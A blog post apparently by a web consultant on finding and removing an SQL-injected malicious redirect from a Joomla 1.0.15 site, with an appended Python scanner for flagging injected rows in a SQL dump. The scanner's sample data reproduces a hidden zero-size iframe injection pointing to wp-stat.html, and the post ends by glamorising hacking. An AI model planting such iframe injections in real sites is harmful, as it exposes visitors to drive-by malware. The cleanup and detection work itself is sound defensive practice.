A client of mine contacted me to let me know they had received an email from the Google search quality team, which had found malicious code inside their Joomla website. The website was running Joomla 1.0.15 and had been attacked by an SQL injection that exploited a deprecated form script. Here is how I traced the source and fixed the problem.
Firstly, the thing that triggered concern was when the site was viewed through Internet Explorer. The little yellow bar popped up that notifies the user that an ActiveX install is about to be performed. There should be no scripts on the web page that require this. Obviously Firefox was not affected. The redirection path only flashed up in the IE browser status bar (bottom left) for a second, so I used the 'print screen' button on the keyboard during that second to capture the screen image. I then opened up an image editor and pasted the resulting clipboard screen dump into it. From there I wrote down the address of the invading website and ran a whois search on the IP address obtained, which led to a provincial area in China. I notified the owners (probably of little effect) and copied the path that I was being redirected to into Notepad.
route: 61.155.0.0/16
descr: CHINANET jiangsu province network
country: CN
origin: AS23650
mnt-by: MAINT-CHINANET-JS
changed: 20030414
source: APNIC
The email from Google stated that malware was used and the site had been blacklisted, but was otherwise unhelpful as it came from a 'noreply' address. Until such time as I removed the offending code, Google would continue to blacklist me and notify users that the website was infected. Not good. Inside Joomla I downloaded a SQL dump file and opened it up in WordPad. I knew the path I was being redirected to (wp-stat.html), so I had WordPad search for the term 'wp-stat', which it found an entry for, as shown.
You can see (well, not quite here) that the entry was made in the 'jos_modules' table. I have a database manager installed in Joomla, so I now simply had to open it, click on the _modules table and remove the offending entry. After this was done I no longer received the ActiveX prompt in Internet Explorer, and antivirus (AVG only) no longer complained. Now I simply had to submit a review to Google Analytics and they would remove me from the blacklist. This was done through Google's nicely designed 'Webmaster Tools'.
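As an added example (not part of the original post), here is a small Python script that does the same job as searching the SQL dump in WordPad: it walks every INSERT row in a dump and flags rows that carry the usual markers of an injected module (hidden iframes, script tags, zero-size elements, links to hosts that are not the site's own, or a keyword such as 'wp-stat'). The sample dump rows, the host 192.0.2.10 and the hostname www.example.com are constructed for the example and are not from the compromised site.

```python
import re

# Constructed sample: three INSERT rows in the style of a Joomla 1.0 SQL dump.
# Row 57 imitates the injected jos_modules entry described in the post;
# 192.0.2.10 is a documentation address, not the real host from the whois lookup.
SAMPLE_DUMP = r"""
INSERT INTO `jos_modules` VALUES (1, 'Main Menu', '', 1, 'left', 0, '0000-00-00 00:00:00', 1, 'mod_mainmenu', 0, 0, 1, 'menutype=mainmenu', 0, 0);
INSERT INTO `jos_modules` VALUES (57, '', '<iframe src=\"http://192.0.2.10/wp-stat.html\" width=\"0\" height=\"0\" style=\"display:none\"></iframe>', 1, 'debug', 0, '0000-00-00 00:00:00', 1, 'mod_custom', 0, 0, 1, '', 0, 0);
INSERT INTO `jos_content` VALUES (3, 'About us', 'about-us', '<p>Visit our <a href=\"http://www.example.com/shop\">shop</a>.</p>', '', 1);
"""

# Markers that legitimate Joomla module/content rows rarely contain.
INDICATORS = [
    (re.compile(r"<iframe\b", re.I), "iframe tag"),
    (re.compile(r"<script\b", re.I), "script tag"),
    (re.compile(r"display\s*:\s*none", re.I), "hidden element"),
    (re.compile(r"(?:width|height)=\\?[\"']?0\b", re.I), "zero-size element"),
]
# One single-row INSERT per line, as mysqldump writes them with --skip-extended-insert.
INSERT_RE = re.compile(r"INSERT INTO `?(\w+)`? VALUES\s*\((\d+),(.*?)\);$", re.M | re.S)
URL_RE = re.compile(r"https?://([\w.-]+)", re.I)


def scan_dump(dump, own_hosts, extra_terms=()):
    """Return [(table, row_id, [reasons])] for every INSERT row that looks injected.

    own_hosts: hostnames the site legitimately links to (lower-case).
    extra_terms: strings seen in the redirect, e.g. ('wp-stat',).
    """
    findings = []
    for m in INSERT_RE.finditer(dump):
        table, row_id, body = m.group(1), int(m.group(2)), m.group(3)
        reasons = [label for rx, label in INDICATORS if rx.search(body)]
        for host in URL_RE.findall(body):
            if host.lower() not in own_hosts:
                reasons.append("link to external host " + host)
        for term in extra_terms:
            if term.lower() in body.lower():
                reasons.append("contains '" + term + "'")
        if reasons:
            findings.append((table, row_id, reasons))
    return findings


if __name__ == "__main__":
    for table, row_id, reasons in scan_dump(SAMPLE_DUMP, {"www.example.com"}, ("wp-stat",)):
        print("%s id=%d: %s" % (table, row_id, "; ".join(reasons)))
```

Run against a real dump, the script reports the table and row id to delete, which is the row the post removed by hand from jos_modules.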
One of the negatives of using older scripts within websites is the exploits that are being developed for them daily. I am often asked why people bother hacking. Hacking is addictive, and hackers are by nature inquisitive and addictive people. Imagine you had trained in Kung Fu all your life and you knew you were good. All that knowledge is great, but it is useless unless applied. Hackers apply their knowledge by hacking, just like a boxer boxes and a mechanic fixes cars. Such skill could certainly be focussed elsewhere; however, the adrenalin and excitement of breaching a system is very luring.